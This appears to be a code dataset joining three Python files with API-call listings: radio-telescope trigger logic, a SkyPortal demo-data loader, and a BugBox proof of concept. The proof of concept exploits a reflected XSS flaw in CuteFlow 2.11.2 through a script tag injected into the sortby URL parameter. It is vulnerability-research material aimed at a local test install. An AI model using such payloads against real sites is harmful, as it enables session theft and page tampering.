snr_min_lofar = self.thresh_lofar['snr_min']
dm_min_lofar = dm_min
width_max_lofar = self.thresh_lofar['width_max']
max_cands_per_cluster = np.inf
# Overrides for specific sources
if src_name in self.lofar_trigger_sources:
# check CB number
try:
allowed_cbs = self.thresh_lofar_override['cb']
if isinstance(allowed_cbs, float):
allowed_cbs = [allowed_cbs]
if self.obs_config['beam'] not in allowed_cbs:
return
except KeyError:
# any CB is valid if cb key is not present
pass
else:
# source known, CB valid: set thresholds
snr_min_lofar = self.thresh_lofar_override['snr_min']
width_max_lofar = self.thresh_lofar_override['width_max']
self.logger.warning("Setting LOFAR trigger thresholds: S/N > {}, "
"downsamp <= {}".format(snr_min_lofar, width_max_lofar))
else:
# new source, apply all LOFAR thresholds
snr_min_lofar = self.thresh_lofar['snr_min']
dm_min_lofar = max(dmgal * self.thresh_lofar['dm_frac_min'], self.dm_min_global)
width_max_lofar = self.thresh_lofar['width_max']
max_cands_per_cluster = self.thresh_lofar['max_cands_per_cluster']
# create mask for given thresholds
# also remove triggers where number of raw candidates is too high (this indicates RFI)
mask = (cluster_snr >= snr_min_lofar) & (cluster_dm >= dm_min_lofar) & \
(cluster_downsamp <= width_max_lofar) & \
(ncand_per_cluster <= max_cands_per_cluster)
# check for any remaining triggers
if np.any(mask):
ncluster = np.sum(mask)
self.logger.info("Found {} possible LOFAR trigger(s)".format(ncluster))
# note: the server keeps track of when LOFAR triggers were sent
# and whether or not a new trigger can be sent
# check if there are multiple triggers
if ncluster > 1:
self.logger.info("Multiple triggers - selecting trigger with highest S/N")
# argmax also works if there is one trigger, so just run it always
ind = np.argmax(cluster_snr[mask])
# estimate flux density based on peak S/N and width
snr = cluster_snr[mask][ind]
width = TSAMP.to(u.ms) * cluster_downsamp[mask][ind]
# astropy units only knows mJy, but the VOEvent Generator expects Jy
flux = util.get_flux(snr, width).to(u.mJy).value / 1000.
# select known source DM if available
if dm_src is not None:
dm_to_send = dm_src
dm_err = 0.
else:
dm_to_send = cluster_dm[mask][ind]
# set DM uncertainty to DM delay across pulse width
# Apertif has roughly 1 DM unit = 1 ms delay across band
dm_err = width.to(u.ms).value
# calculate arrival time at reference frequency = central frequency
cent_freq = sys_params['nu_GHz'] * 1000.
max_freq = cent_freq + .5 * BANDWIDTH.to(u.MHz).value
dm_delay = 4.148808E3 * dm_to_send * (cent_freq**-2 - max_freq**-2)
utc_arr = (utc_start + TimeDelta(cluster_time[mask][ind] - dm_delay, format='sec')).isot
# set a source name
if src_type is not None:
name = src_type
else:
name = 'candidate'
# check whether or not pointing information is available
if pointing is None:
self.logger.error("No pointing information available - cannot trigger LOFAR")
# check if we are connected to the server
elif not self.have_lofar:
self.logger.error("No LOFAR Trigger connection available - cannot trigger LOFAR")
# do the trigger
else:
# create the full trigger and put on VO queue
lofar_trigger = {'dm': dm_to_send,
'dm_err': dm_err,
'width': width.to(u.ms).value, # ms
'snr': snr,
'flux': flux, # Jy
'ra': pointing.ra.deg, # decimal deg
'dec': pointing.dec.deg, # decimal deg
'cb': self.obs_config['beam'],
'sb': cluster_sb[mask][ind],
'ymw16': dmgal,
'semiMaj': 15, # arcmin, CB
'semiMin': 15, # arcmin, CB
'name': name,
'src_name': src_name,
'datetimesource': datetimesource,
'utc': utc_arr,
'tarr': cluster_time[mask][ind],
'importance': 0.1}
# add system parameters (dt, central freq (GHz), bandwidth (MHz))
lofar_trigger.update(sys_params)
self.logger.info("Sending LOFAR trigger to LOFAR Trigger system")
self.lofar_queue.put(lofar_trigger)
if self.have_vo:
self.logger.info("Sending same trigger to VOEvent system")
self.vo_queue.put(lofar_trigger)
else:
self.logger.error("No VOEvent Generator connection available - not sending VO trigger")
def _process_triggers(self):
"""
Read thresholds (DM, width, S/N) for clustering
Continuously read AMBER triggers from queue and start processing for known and/or new sources
"""
# set observation parameters
utc_start = Time(self.obs_config['startpacket'] / TIME_UNIT, format='unix')
datetimesource = self.obs_config['datetimesource']
dt = TSAMP.to(u.second).value
chan_width = (BANDWIDTH / float(NCHAN)).to(u.MHz).value
cent_freq = (self.obs_config['min_freq'] * u.MHz + 0.5 * BANDWIDTH).to(u.GHz).value
sys_params = {'dt': dt, 'delta_nu_MHz': chan_width, 'nu_GHz': cent_freq}
pointing = self._get_pointing()
dmgal = util.get_ymw16(self.obs_config['parset'], self.obs_config['beam'], self.logger)
# get known source dm and type
dm_src, src_type, src_name = self._get_source()
if src_type is not None:
thresh_src = {'dm_src': dm_src,
'src_type': src_type,
'src_name': src_name,
'dm_min': max(dm_src - self.dm_range, self.dm_min_global),
'dm_max': dm_src + self.dm_range,
'width_max': np.inf,
'snr_min': self.snr_min_global,
'pointing': pointing,
'dmgal': dmgal
}
self.logger.info("Setting {src_name} trigger DM range to {dm_min} - {dm_max}, "
"max downsamp={width_max}, min S/N={snr_min}".format(**thresh_src))
# set min and max DM for new sources with unknown DM
thresh_new = {'src_type': None,
'src_name': None,
'dm_min': max(dmgal * self.thresh_iquv['dm_frac_min'], self.dm_min_global),
'dm_max': np.inf,
'width_max': self.thresh_iquv['width_max'],
'snr_min': self.thresh_iquv['snr_min'],
'pointing': pointing,
'dmgal': dmgal
}
# if known source, check whether or not LOFAR triggering should be enabled for new sources
if src_type is not None and src_name in self.lofar_trigger_sources:
thresh_new['skip_lofar'] = not self.thresh_lofar['trigger_on_new_sources']
else:
thresh_new['skip_lofar'] = False
self.logger.info("Setting new source trigger DM range to {dm_min} - {dm_max}, "
"max downsamp={width_max}, min S/N={snr_min}, skip LOFAR "
"triggering={skip_lofar}".format(**thresh_new))
# main loop
while self.observation_running:
if self.amber_triggers:
# Copy the triggers so class-wide list can receive new triggers without those getting lost
with self.lock:
triggers = self.amber_triggers
self.amber_triggers = []
# check for header (always, because it is received once for every amber instance)
if not self.hdr_mapping:
for trigger in triggers:
if trigger.startswith('#'):
# read header, remove comment symbol
header = trigger.split()[1:]
self.logger.info("Received header: {}".format(header))
# Check if all required params are present and create mapping to col index
keys = ['beam_id', 'integration_step', 'time', 'DM', 'SNR']
for key in keys:
try:
self.hdr_mapping[key] = header.index(key)
except ValueError:
self.logger.error("Key missing from clusters header: {}".format(key))
self.hdr_mapping = {}
return
# header should be present now
if not self.hdr_mapping:
self.logger.error("First clusters received but header not found")
continue
# remove headers from triggers (i.e. any trigger starting with #)
triggers = [trigger for trigger in triggers if not trigger.startswith('#')]
# triggers is empty if only header was received
if not triggers:
self.logger.info("Only header received - Canceling processing")
continue
# split strings and convert to numpy array
try:
triggers = np.array(list(map(lambda val: val.split(), triggers)), dtype=float)
except Exception as e:
self.logger.error("Failed to process triggers: {}".format(e))
continue
# pick columns to feed to clustering algorithm
triggers_for_clustering = triggers[:, (self.hdr_mapping['DM'], self.hdr_mapping['SNR'],
self.hdr_mapping['time'], self.hdr_mapping['integration_step'],
self.hdr_mapping['beam_id'])]
# known source and new source triggering, in thread so clustering itself does not
# delay next run
# known source triggering
if src_type is not None:
self.threads['trigger_known_source'] = threading.Thread(target=self._check_triggers,
args=(triggers_for_clustering, sys_params,
utc_start, datetimesource),
kwargs=thresh_src)
self.threads['trigger_known_source'].start()
# new source triggering
self.threads['trigger_new_source'] = threading.Thread(target=self._check_triggers,
args=(triggers_for_clustering, sys_params,
utc_start, datetimesource),
kwargs=thresh_new)
self.threads['trigger_new_source'].start()
sleep(self.interval)
self.logger.info("Observation finished")
def _get_pointing(self):
"""
Get pointing of this CB from parset
:return: pointing SkyCoord
"""
# read parset
try:
parset = self.obs_config['parset']
except KeyError as e:
self.logger.error("Cannot read parset ({})".format(e))
return None
# read beam
try:
beam = self.obs_config['beam']
except KeyError as e:
self.logger.error("Cannot read beam from parset, setting CB to 0 ({})".format(e))
beam = 0
# read beam coordinates from parset
try:
key = "task.beamSet.0.compoundBeam.{}.phaseCenter".format(beam)
c1, c2 = ast.literal_eval(parset[key].replace('deg', ''))
c1 = c1 * u.deg
c2 = c2 * u.deg
except Exception as e:
self.logger.error("Could not parse pointing for CB{:02d} ({})".format(beam, e))
return None
# convert HA to RA if HADEC is used
if parset['task.directionReferenceFrame'].upper() == 'HADEC':
# Get RA at the mid point of the observation
timestamp = Time(parset['task.startTime']) + .5 * float(parset['task.duration']) * u.s
c1, c2 = util.radec_to_hadec(c1, c2, timestamp)
# create SkyCoord object
pointing = SkyCoord(c1, c2)
return pointing
def _load_parset(self, obs_config):
"""
Load the observation parset
:param dict obs_config: Observation config
:return: parset as dict
"""
try:
# encoded parset is already in config on master node
# decode the parset
raw_parset = util.decode_parset(obs_config['parset'])
# convert to dict and store
parset = util.parse_parset(raw_parset)
except KeyError:
self.logger.info("Observation parset not found in input config, looking for master parset")
# Load the parset from the master parset file
master_config_file = os.path.join(obs_config['master_dir'], 'parset', 'darc_master.parset')
try:
# Read raw config
with open(master_config_file) as f:
master_config = f.read().strip()
# Convert to dict
master_config = util.parse_parset(master_config)
# extract obs parset and decode
raw_parset = util.decode_parset(master_config['parset'])
parset = util.parse_parset(raw_parset)
except Exception as e:
self.logger.warning(
"Failed to load parset from master config file {}, "
"setting parset to None: {}".format(master_config_file, e))
parset = None
return parset
| [((45, 27, 45, 37), 'multiprocessing.Queue', 'mp.Queue', ({}, {}), '()', True, 'import multiprocessing as mp\n'), ((53, 20, 53, 29), 'multiprocessing.Lock', 'mp.Lock', ({}, {}), '()', True, 'import multiprocessing as mp\n'), ((56, 25, 56, 35), 'astropy.time.Time.now', 'Time.now', ({}, {}), '()', False, 'from astropy.time import Time, TimeDelta\n'), ((168, 37, 168, 84), 'threading.Thread', 'threading.Thread', (), '', False, 'import threading\n'), ((196, 8, 196, 48), 'darc.VOEventQueueServer.register', 'VOEventQueueServer.register', ({(196, 36, 196, 47): '"""get_queue"""'}, {}), "('get_queue')", False, 'from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer\n'), ((201, 17, 201, 72), 'darc.VOEventQueueServer', 'VOEventQueueServer', (), '', False, 'from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer\n'), ((210, 8, 210, 53), 'darc.LOFARTriggerQueueServer.register', 'LOFARTriggerQueueServer.register', ({(210, 41, 210, 52): '"""get_queue"""'}, {}), "('get_queue')", False, 'from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer\n'), ((215, 17, 215, 77), 'darc.LOFARTriggerQueueServer', 'LOFARTriggerQueueServer', (), '', False, 'from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer\n'), ((283, 12, 288, 44), 'darc.external.tools.get_triggers', 'tools.get_triggers', (), '', False, 'from darc.external import tools\n'), ((314, 14, 314, 24), 'astropy.time.Time.now', 'Time.now', ({}, {}), '()', False, 'from astropy.time import Time, TimeDelta\n'), ((382, 11, 382, 23), 'numpy.any', 'np.any', ({(382, 18, 382, 22): 'mask'}, {}), '(mask)', True, 'import numpy as np\n'), ((462, 20, 462, 83), 'astropy.time.Time', 'Time', (), '', False, 'from astropy.time import Time, TimeDelta\n'), ((469, 16, 469, 95), 'darc.util.get_ymw16', 'util.get_ymw16', ({(469, 31, 469, 56): "self.obs_config['parset']", (469, 58, 469, 81): "self.obs_config['beam']", (469, 83, 469, 94): 'self.logger'}, {}), "(self.obs_config['parset'], self.obs_config['beam'], self.logger)", False, 'from darc import util\n'), ((608, 19, 608, 35), 'astropy.coordinates.SkyCoord', 'SkyCoord', ({(608, 28, 608, 30): 'c1', (608, 32, 608, 34): 'c2'}, {}), '(c1, c2)', False, 'from astropy.coordinates import SkyCoord\n'), ((71, 28, 71, 38), 'multiprocessing.Queue', 'mp.Queue', ({}, {}), '()', True, 'import multiprocessing as mp\n'), ((87, 31, 87, 41), 'multiprocessing.Queue', 'mp.Queue', ({}, {}), '()', True, 'import multiprocessing as mp\n'), ((291, 15, 291, 41), 'numpy.array', 'np.array', ({(291, 24, 291, 40): 'cluster_downsamp'}, {}), '(cluster_downsamp)', True, 'import numpy as np\n'), ((292, 22, 292, 43), 'numpy.array', 'np.array', ({(292, 31, 292, 42): 'cluster_snr'}, {}), '(cluster_snr)', True, 'import numpy as np\n'), ((293, 21, 293, 41), 'numpy.array', 'np.array', ({(293, 30, 293, 40): 'cluster_dm'}, {}), '(cluster_dm)', True, 'import numpy as np\n'), ((294, 23, 294, 45), 'numpy.array', 'np.array', ({(294, 32, 294, 44): 'cluster_time'}, {}), '(cluster_time)', True, 'import numpy as np\n'), ((383, 23, 383, 35), 'numpy.sum', 'np.sum', ({(383, 30, 383, 34): 'mask'}, {}), '(mask)', True, 'import numpy as np\n'), ((392, 18, 392, 46), 'numpy.argmax', 'np.argmax', ({(392, 28, 392, 45): 'cluster_snr[mask]'}, {}), '(cluster_snr[mask])', True, 'import numpy as np\n'), ((464, 13, 464, 31), 'darc.definitions.TSAMP.to', 'TSAMP.to', ({(464, 22, 464, 30): 'u.second'}, {}), '(u.second)', False, 'from darc.definitions import TSAMP, NCHAN, BANDWIDTH, MASTER, TIME_UNIT\n'), ((572, 12, 572, 32), 'time.sleep', 'sleep', ({(572, 18, 572, 31): 'self.interval'}, {}), '(self.interval)', False, 'from time import sleep\n'), ((606, 21, 606, 59), 'darc.util.radec_to_hadec', 'util.radec_to_hadec', ({(606, 41, 606, 43): 'c1', (606, 45, 606, 47): 'c2', (606, 49, 606, 58): 'timestamp'}, {}), '(c1, c2, timestamp)', False, 'from darc import util\n'), ((621, 25, 621, 65), 'darc.util.decode_parset', 'util.decode_parset', ({(621, 44, 621, 64): "obs_config['parset']"}, {}), "(obs_config['parset'])", False, 'from darc import util\n'), ((623, 21, 623, 50), 'darc.util.parse_parset', 'util.parse_parset', ({(623, 39, 623, 49): 'raw_parset'}, {}), '(raw_parset)', False, 'from darc import util\n'), ((98, 30, 98, 66), 'yaml.load', 'yaml.load', (), '', False, 'import yaml\n'), ((198, 28, 198, 64), 'yaml.load', 'yaml.load', (), '', False, 'import yaml\n'), ((212, 28, 212, 64), 'yaml.load', 'yaml.load', (), '', False, 'import yaml\n'), ((320, 35, 320, 88), 'astropy.time.TimeDelta', 'TimeDelta', (), '', False, 'from astropy.time import Time, TimeDelta\n'), ((395, 20, 395, 34), 'darc.definitions.TSAMP.to', 'TSAMP.to', ({(395, 29, 395, 33): 'u.ms'}, {}), '(u.ms)', False, 'from darc.definitions import TSAMP, NCHAN, BANDWIDTH, MASTER, TIME_UNIT\n'), ((566, 53, 569, 88), 'threading.Thread', 'threading.Thread', (), '', False, 'import threading\n'), ((605, 24, 605, 54), 'astropy.time.Time', 'Time', ({(605, 29, 605, 53): "parset['task.startTime']"}, {}), "(parset['task.startTime'])", False, 'from astropy.time import Time, TimeDelta\n'), ((627, 33, 627, 103), 'os.path.join', 'os.path.join', ({(627, 46, 627, 70): "obs_config['master_dir']", (627, 72, 627, 80): '"""parset"""', (627, 82, 627, 102): '"""darc_master.parset"""'}, {}), "(obs_config['master_dir'], 'parset', 'darc_master.parset')", False, 'import os\n'), ((295, 27, 295, 53), 'numpy.array', 'np.array', ({(295, 36, 295, 52): 'cluster_downsamp'}, {}), '(cluster_downsamp)', True, 'import numpy as np\n'), ((296, 21, 296, 41), 'numpy.array', 'np.array', ({(296, 30, 296, 40): 'cluster_sb'}, {}), '(cluster_sb)', True, 'import numpy as np\n'), ((297, 28, 297, 55), 'numpy.array', 'np.array', ({(297, 37, 297, 54): 'ncand_per_cluster'}, {}), '(ncand_per_cluster)', True, 'import numpy as np\n'), ((411, 35, 411, 94), 'astropy.time.TimeDelta', 'TimeDelta', (), '', False, 'from astropy.time import Time, TimeDelta\n'), ((560, 59, 563, 94), 'threading.Thread', 'threading.Thread', (), '', False, 'import threading\n'), ((633, 32, 633, 64), 'darc.util.parse_parset', 'util.parse_parset', ({(633, 50, 633, 63): 'master_config'}, {}), '(master_config)', False, 'from darc import util\n'), ((635, 29, 635, 72), 'darc.util.decode_parset', 'util.decode_parset', ({(635, 48, 635, 71): "master_config['parset']"}, {}), "(master_config['parset'])", False, 'from darc import util\n'), ((636, 25, 636, 54), 'darc.util.parse_parset', 'util.parse_parset', ({(636, 43, 636, 53): 'raw_parset'}, {}), '(raw_parset)', False, 'from darc import util\n'), ((409, 40, 409, 59), 'darc.definitions.BANDWIDTH.to', 'BANDWIDTH.to', ({(409, 53, 409, 58): 'u.MHz'}, {}), '(u.MHz)', False, 'from darc.definitions import TSAMP, NCHAN, BANDWIDTH, MASTER, TIME_UNIT\n'), ((397, 19, 397, 44), 'darc.util.get_flux', 'util.get_flux', ({(397, 33, 397, 36): 'snr', (397, 38, 397, 43): 'width'}, {}), '(snr, width)', False, 'from darc import util\n')] |
glenn2763/skyportal | tools/load_demo_data.py | 79dc11bfe08076d9c1f920bad85681ab001e22c8 | import datetime
import os
import subprocess
import base64
from pathlib import Path
import shutil
import pandas as pd
import signal
import requests
from baselayer.app.env import load_env
from baselayer.app.model_util import status, create_tables, drop_tables
from social_tornado.models import TornadoStorage
from skyportal.models import init_db, Base, DBSession, Source, User
from skyportal.model_util import setup_permissions, create_token
from skyportal.tests import api
from baselayer.tools.test_frontend import verify_server_availability
if __name__ == "__main__":
"""Insert test data"""
env, cfg = load_env()
basedir = Path(os.path.dirname(__file__)) / ".."
with status(f"Connecting to database {cfg['database']['database']}"):
init_db(**cfg["database"])
with status("Dropping all tables"):
drop_tables()
with status("Creating tables"):
create_tables()
for model in Base.metadata.tables:
print(" -", model)
with status(f"Creating permissions"):
setup_permissions()
with status(f"Creating dummy users"):
super_admin_user = User(
username="[email protected]", role_ids=["Super admin"]
)
group_admin_user = User(
username="[email protected]", role_ids=["Super admin"]
)
full_user = User(username="[email protected]", role_ids=["Full user"])
view_only_user = User(
username="[email protected]", role_ids=["View only"]
)
DBSession().add_all(
[super_admin_user, group_admin_user, full_user, view_only_user]
)
for u in [super_admin_user, group_admin_user, full_user, view_only_user]:
DBSession().add(
TornadoStorage.user.create_social_auth(u, u.username, "google-oauth2")
)
with status("Creating token"):
token = create_token(
[
"Manage groups",
"Manage sources",
"Upload data",
"Comment",
"Manage users",
],
super_admin_user.id,
"load_demo_data token",
)
def assert_post(endpoint, data):
response_status, data = api("POST", endpoint, data, token)
if not response_status == 200 and data["status"] == "success":
raise RuntimeError(
f'API call to {endpoint} failed with status {status}: {data["message"]}'
)
return data
with status("Launching web app & executing API calls"):
try:
response_status, data = api("GET", "sysinfo", token=token)
app_already_running = True
except requests.ConnectionError:
app_already_running = False
web_client = subprocess.Popen(
["make", "run"], cwd=basedir, preexec_fn=os.setsid
)
server_url = f"http://localhost:{cfg['ports.app']}"
print()
print(f"Waiting for server to appear at {server_url}...")
try:
verify_server_availability(server_url)
print("App running - continuing with API calls")
with status("Creating dummy group & adding users"):
data = assert_post(
"groups",
data={
"name": "Stream A",
"group_admins": [
super_admin_user.username,
group_admin_user.username,
],
},
)
group_id = data["data"]["id"]
for u in [view_only_user, full_user]:
data = assert_post(
f"groups/{group_id}/users/{u.username}", data={"admin": False}
)
with status("Creating dummy instruments"):
data = assert_post(
"telescope",
data={
"name": "Palomar 1.5m",
"nickname": "P60",
"lat": 33.3633675,
"lon": -116.8361345,
"elevation": 1870,
"diameter": 1.5,
"group_ids": [group_id],
},
)
telescope1_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "P60 Camera",
"type": "phot",
"band": "optical",
"telescope_id": telescope1_id,
},
)
instrument1_id = data["data"]["id"]
data = assert_post(
"telescope",
data={
"name": "Nordic Optical Telescope",
"nickname": "NOT",
"lat": 28.75,
"lon": 17.88,
"elevation": 1870,
"diameter": 2.56,
"group_ids": [group_id],
},
)
telescope2_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "ALFOSC",
"type": "both",
"band": "optical",
"telescope_id": telescope2_id,
},
)
with status("Creating dummy sources"):
SOURCES = [
{
"id": "14gqr",
"ra": 353.36647,
"dec": 33.646149,
"redshift": 0.063,
"group_ids": [group_id],
"comments": [
"No source at transient location to R>26 in LRIS imaging",
"Strong calcium lines have emerged.",
],
},
{
"id": "16fil",
"ra": 322.718872,
"dec": 27.574113,
"redshift": 0.0,
"group_ids": [group_id],
"comments": ["Frogs in the pond", "The eagle has landed"],
},
]
(basedir / "static/thumbnails").mkdir(parents=True, exist_ok=True)
for source_info in SOURCES:
comments = source_info.pop("comments")
data = assert_post("sources", data=source_info)
assert data["data"]["id"] == source_info["id"]
for comment in comments:
data = assert_post(
"comment",
data={"source_id": source_info["id"], "text": comment},
)
phot_file = basedir / "skyportal/tests/data/phot.csv"
phot_data = pd.read_csv(phot_file)
data = assert_post(
"photometry",
data={
"source_id": source_info["id"],
"time_format": "iso",
"time_scale": "utc",
"instrument_id": instrument1_id,
"observed_at": phot_data.observed_at.tolist(),
"mag": phot_data.mag.tolist(),
"e_mag": phot_data.e_mag.tolist(),
"lim_mag": phot_data.lim_mag.tolist(),
"filter": phot_data["filter"].tolist(),
},
)
spec_file = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"skyportal",
"tests",
"data",
"spec.csv",
)
spec_data = pd.read_csv(spec_file)
for i, df in spec_data.groupby("instrument_id"):
data = assert_post(
"spectrum",
data={
"source_id": source_info["id"],
"observed_at": str(datetime.datetime(2014, 10, 24)),
"instrument_id": 1,
"wavelengths": df.wavelength.tolist(),
"fluxes": df.flux.tolist(),
},
)
for ttype in ["new", "ref", "sub"]:
fname = f'{source_info["id"]}_{ttype}.png'
fpath = basedir / f"skyportal/tests/data/{fname}"
thumbnail_data = base64.b64encode(
open(os.path.abspath(fpath), "rb").read()
)
data = assert_post(
"thumbnail",
data={
"source_id": source_info["id"],
"data": thumbnail_data,
"ttype": ttype,
},
)
source = Source.query.get(source_info["id"])
source.add_linked_thumbnails()
finally:
if not app_already_running:
print("Terminating web app")
os.killpg(os.getpgid(web_client.pid), signal.SIGTERM)
| [((22, 15, 22, 25), 'baselayer.app.env.load_env', 'load_env', ({}, {}), '()', False, 'from baselayer.app.env import load_env\n'), ((25, 9, 25, 72), 'baselayer.app.model_util.status', 'status', ({(25, 16, 25, 71): 'f"""Connecting to database {cfg[\'database\'][\'database\']}"""'}, {}), '(f"Connecting to database {cfg[\'database\'][\'database\']}")', False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((26, 8, 26, 34), 'skyportal.models.init_db', 'init_db', ({}, {}), "(**cfg['database'])", False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((28, 9, 28, 38), 'baselayer.app.model_util.status', 'status', ({(28, 16, 28, 37): '"""Dropping all tables"""'}, {}), "('Dropping all tables')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((29, 8, 29, 21), 'baselayer.app.model_util.drop_tables', 'drop_tables', ({}, {}), '()', False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((31, 9, 31, 34), 'baselayer.app.model_util.status', 'status', ({(31, 16, 31, 33): '"""Creating tables"""'}, {}), "('Creating tables')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((32, 8, 32, 23), 'baselayer.app.model_util.create_tables', 'create_tables', ({}, {}), '()', False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((37, 9, 37, 40), 'baselayer.app.model_util.status', 'status', ({(37, 16, 37, 39): 'f"""Creating permissions"""'}, {}), "(f'Creating permissions')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((38, 8, 38, 27), 'skyportal.model_util.setup_permissions', 'setup_permissions', ({}, {}), '()', False, 'from skyportal.model_util import setup_permissions, create_token\n'), ((40, 9, 40, 40), 'baselayer.app.model_util.status', 'status', ({(40, 16, 40, 39): 'f"""Creating dummy users"""'}, {}), "(f'Creating dummy users')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((41, 27, 43, 9), 'skyportal.models.User', 'User', (), '', False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((44, 27, 46, 9), 'skyportal.models.User', 'User', (), '', False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((47, 20, 47, 83), 'skyportal.models.User', 'User', (), '', False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((48, 25, 50, 9), 'skyportal.models.User', 'User', (), '', False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((60, 9, 60, 33), 'baselayer.app.model_util.status', 'status', ({(60, 16, 60, 32): '"""Creating token"""'}, {}), "('Creating token')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((61, 16, 71, 9), 'skyportal.model_util.create_token', 'create_token', ({(62, 12, 68, 13): "['Manage groups', 'Manage sources', 'Upload data', 'Comment', 'Manage users']", (69, 12, 69, 31): 'super_admin_user.id', (70, 12, 70, 34): '"""load_demo_data token"""'}, {}), "(['Manage groups', 'Manage sources', 'Upload data', 'Comment',\n 'Manage users'], super_admin_user.id, 'load_demo_data token')", False, 'from skyportal.model_util import setup_permissions, create_token\n'), ((74, 32, 74, 66), 'skyportal.tests.api', 'api', ({(74, 36, 74, 42): '"""POST"""', (74, 44, 74, 52): 'endpoint', (74, 54, 74, 58): 'data', (74, 60, 74, 65): 'token'}, {}), "('POST', endpoint, data, token)", False, 'from skyportal.tests import api\n'), ((81, 9, 81, 58), 'baselayer.app.model_util.status', 'status', ({(81, 16, 81, 57): '"""Launching web app & executing API calls"""'}, {}), "('Launching web app & executing API calls')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((23, 19, 23, 44), 'os.path.dirname', 'os.path.dirname', ({(23, 35, 23, 43): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((83, 36, 83, 70), 'skyportal.tests.api', 'api', (), '', False, 'from skyportal.tests import api\n'), ((96, 12, 96, 50), 'baselayer.tools.test_frontend.verify_server_availability', 'verify_server_availability', ({(96, 39, 96, 49): 'server_url'}, {}), '(server_url)', False, 'from baselayer.tools.test_frontend import verify_server_availability\n'), ((51, 8, 51, 19), 'skyportal.models.DBSession', 'DBSession', ({}, {}), '()', False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((57, 16, 57, 86), 'social_tornado.models.TornadoStorage.user.create_social_auth', 'TornadoStorage.user.create_social_auth', ({(57, 55, 57, 56): 'u', (57, 58, 57, 68): 'u.username', (57, 70, 57, 85): '"""google-oauth2"""'}, {}), "(u, u.username, 'google-oauth2')", False, 'from social_tornado.models import TornadoStorage\n'), ((87, 25, 89, 13), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((99, 17, 99, 62), 'baselayer.app.model_util.status', 'status', ({(99, 24, 99, 61): '"""Creating dummy group & adding users"""'}, {}), "('Creating dummy group & adding users')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((117, 17, 117, 53), 'baselayer.app.model_util.status', 'status', ({(117, 24, 117, 52): '"""Creating dummy instruments"""'}, {}), "('Creating dummy instruments')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((167, 17, 167, 49), 'baselayer.app.model_util.status', 'status', ({(167, 24, 167, 48): '"""Creating dummy sources"""'}, {}), "('Creating dummy sources')", False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((56, 12, 56, 23), 'skyportal.models.DBSession', 'DBSession', ({}, {}), '()', False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((204, 32, 204, 54), 'pandas.read_csv', 'pd.read_csv', ({(204, 44, 204, 53): 'phot_file'}, {}), '(phot_file)', True, 'import pandas as pd\n'), ((228, 32, 228, 54), 'pandas.read_csv', 'pd.read_csv', ({(228, 44, 228, 53): 'spec_file'}, {}), '(spec_file)', True, 'import pandas as pd\n'), ((256, 29, 256, 64), 'skyportal.models.Source.query.get', 'Source.query.get', ({(256, 46, 256, 63): "source_info['id']"}, {}), "(source_info['id'])", False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((261, 26, 261, 52), 'os.getpgid', 'os.getpgid', ({(261, 37, 261, 51): 'web_client.pid'}, {}), '(web_client.pid)', False, 'import os\n'), ((222, 40, 222, 65), 'os.path.dirname', 'os.path.dirname', ({(222, 56, 222, 64): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((234, 51, 234, 82), 'datetime.datetime', 'datetime.datetime', ({(234, 69, 234, 73): '2014', (234, 75, 234, 77): '10', (234, 79, 234, 81): '24'}, {}), '(2014, 10, 24)', False, 'import datetime\n'), ((245, 33, 245, 55), 'os.path.abspath', 'os.path.abspath', ({(245, 49, 245, 54): 'fpath'}, {}), '(fpath)', False, 'import os\n')] |
UncleWillis/BugBox | framework/Exploits/CUTEFLOW_0024.py | 25682f25fc3222db383649a4924bcd65f2ddcb34 |
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import sys
import os
import time
from selenium.common.exceptions import NoAlertPresentException
import framework
class Exploit (framework.Exploit):
attributes = {'Name' : "CUTEFLOW_0024",
'Description' : "CuteFlow v2.11.2 cross site scripting attack.",
'References' : [['http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/']],
'Target' : "CuteFlow 2.11.2",
'TargetLicense' : '',
'VulWikiPage' : "",
'Type' : 'XSS'
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
self.verified = False
return
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://localhost/cuteflow/pages/showmaillist.php?sortby=\"><script>alert(\"XSS\");</script><p+\"")
self.logger.info("XSS link visited")
try:
driver.get_alert()
self.logger.info("XSS popup comfirmed")
self.verified = True
except NoAlertPresentException:
self.logger.error("XSS failed")
if self.visible:
time.sleep(10)
driver.cleanup()
return
def verify(self):
return self.verified
